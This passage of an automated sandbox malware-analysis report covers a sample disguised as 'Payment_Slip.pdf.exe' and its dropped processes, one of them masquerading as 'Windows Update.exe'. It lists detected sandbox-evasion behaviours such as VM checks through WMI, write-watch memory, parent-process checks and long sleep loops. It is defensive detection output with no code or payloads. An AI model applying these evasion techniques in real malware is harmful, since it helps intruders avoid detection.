Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Delayed program exit found
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040E18D Sleep,ExitProcess, 11_2_0040E18D
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040E18D Sleep,ExitProcess, 17_2_0040E18D
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\host.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: A30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 23A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 43A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 8410000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 9410000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: 9620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: A620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 2EF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 3100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 5100000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 8D80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 74E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: 9D80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory allocated: AD80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\host.exe Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 2FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Memory allocated: 4FA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 1820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 31D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 51D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: B70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 2510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 4510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: F00000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 1590000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 2F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Memory allocated: 4F30000 memory reserve | memory write watch
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 11_2_004186FE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 17_2_004186FE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595250
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6663 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3087 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: threadDelayed 1007 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: threadDelayed 8521 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Window / User API: foregroundWindowGot 1735 Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Window / User API: threadDelayed 4895
Source: C:\Users\user\AppData\Roaming\host.exe Window / User API: threadDelayed 4899
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window / User API: threadDelayed 4837
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Window / User API: threadDelayed 4878
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 3777
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 6042
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 5250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 4533
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 6915
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Window / User API: threadDelayed 2929
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 5278
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Window / User API: threadDelayed 4521
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\dwn.exe API coverage: 4.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 8080 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep count: 209 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5764 Thread sleep time: -104500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep count: 1007 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep time: -3021000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep count: 8521 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe TID: 5292 Thread sleep time: -25563000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe TID: 7876 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7712 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8004 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199655s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199546s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -1199437s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599644s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599441s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599263s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599155s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598710s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -598043s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597937s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597828s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597390s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597168s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -597051s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596406s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596296s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596187s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595968s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595859s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595750s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595640s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\host.exe TID: 8160 Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\conserver.exe TID: 7888 Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8424 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428 Thread sleep count: 3777 > 30
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe TID: 8428 Thread sleep count: 6042 > 30
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe TID: 8592 Thread sleep time: -1199875s >= -30000s
